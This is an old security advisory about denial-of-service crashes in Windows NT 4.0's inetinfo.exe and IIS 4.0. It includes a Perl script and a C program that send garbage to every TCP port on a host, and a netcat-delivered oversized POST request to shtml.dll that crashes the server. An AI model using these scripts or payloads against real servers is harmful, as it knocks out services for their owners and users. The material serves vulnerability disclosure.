COMMAND
inetinfo.exe
SYSTEMS AFFECTED
Win NT 4.0
PROBLEM
Looks like NT is also vulnerable to exactly the same attack as
previously posted connecting and throwing garbage at port 135 on
another port, namely 1031 (inetinfo). The inetinfo.exe process
goes insane on NT4.0. This seems to be exploitable only locally.
To try, telnet to 1031 on an NT machine and type garbage, then
disconnect. Credit for this goes to Bob Beck. David Litchfield
added how you don't even need to type garbage...all you need to
do is telnet to port 1031 and then disconnect.....does the same
job (localhost only and it's not always port 1031 as IIS choose
these ports randomly). Below is what Bob Beck and Chris Bayly
rigged up to check:
#!/usr/local/bin/perl
use Socket;
use FileHandle;
require "chat2.pl";
$ILoveBill = $ARGV[0] && shift;
$verbose = 0; # tell me what you're hitting
$knownports = 0; # don't hit known problem ports
for ($port = $0; $port <65535; $port++)
{
if ($knownports && ($port == 135 || $port== 1031)) {
next;
}
$fh = chat::open_port($ILoveBill, $port);
chat::print ($fh,"Windows NT is the platform of the future");
if ($verbose) {
print "Trying port: $port\n\n";
}
chat::close($fh);
}
Evan L. Carew posted the following code that's ported version
of code above (tested under Linux with GCC v2.7.2.3).
/* This program is not intended to be used to bring down NT */
/* servers or WIN95 clients but rather as a tool for finding */
/* weaknesses in your installations */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <netdb.h>
#include <stdio.h>
#define MAXPORTNUM 65535
int main (int argc, char **argv){
int n, s, len;
u_short soc = 0;
char buf[1024];
char *hostname;
struct hostent *hp;
struct sockaddr_in name;
if(argc < 2){
printf("Usage: %s hostname [hostname]\n", *argv);
exit(1);
}
hostname = *++argv;
hp = gethostbyname(hostname);
soc = 1;
while (soc <= MAXPORTNUM){
/* create a socket */
s = socket(AF_INET, SOCK_STREAM, 0);
memset(&name, 0, sizeof(struct sockaddr_in));
name.sin_family = AF_INET;
name.sin_port = htons(soc);
memcpy(&name.sin_addr, hp->h_addr_list[0], hp->h_length);
len = sizeof(struct sockaddr_in);
printf("Trying port %i\n", soc);
if (!connect(s, (struct sockaddr *)&name, len)){
printf("connected to port %i\n", soc);
strcpy(buf, "jfiebnfvmrur84j dfj494 40wetnt");
len = strlen(buf);
n = send(s, buf, len, 0);
}
close(s);
++soc;
}
exit(0);
}
Richard Bellamy came with following. Using that wonderful little
tool ported by l0pht from Hobbit's NetCat, he found that when
sending the following command, to port 80 of an IIS 4.0 server:
POST /_vti_bin/shtml.dll///////////////(and about 130,000 more of these)/
HTTP/1.0
Inetinfo causes a Page Fault, DRWATSON shows up and takes 100% CPU
time. He putted the command in a text file and performed the
following:
nc -v -v www.myserver.com 80 > send1.3.cap
The send1.3.cap file was approximately 128kb when it crash's
Inetinfo (when the send1.3.cap file was 96kb, Inetinfo worked just
fine).
SOLUTION
Not available at this moment. Anyway, see if You need vulenarable
ports. If You don't, GREAT and disable them!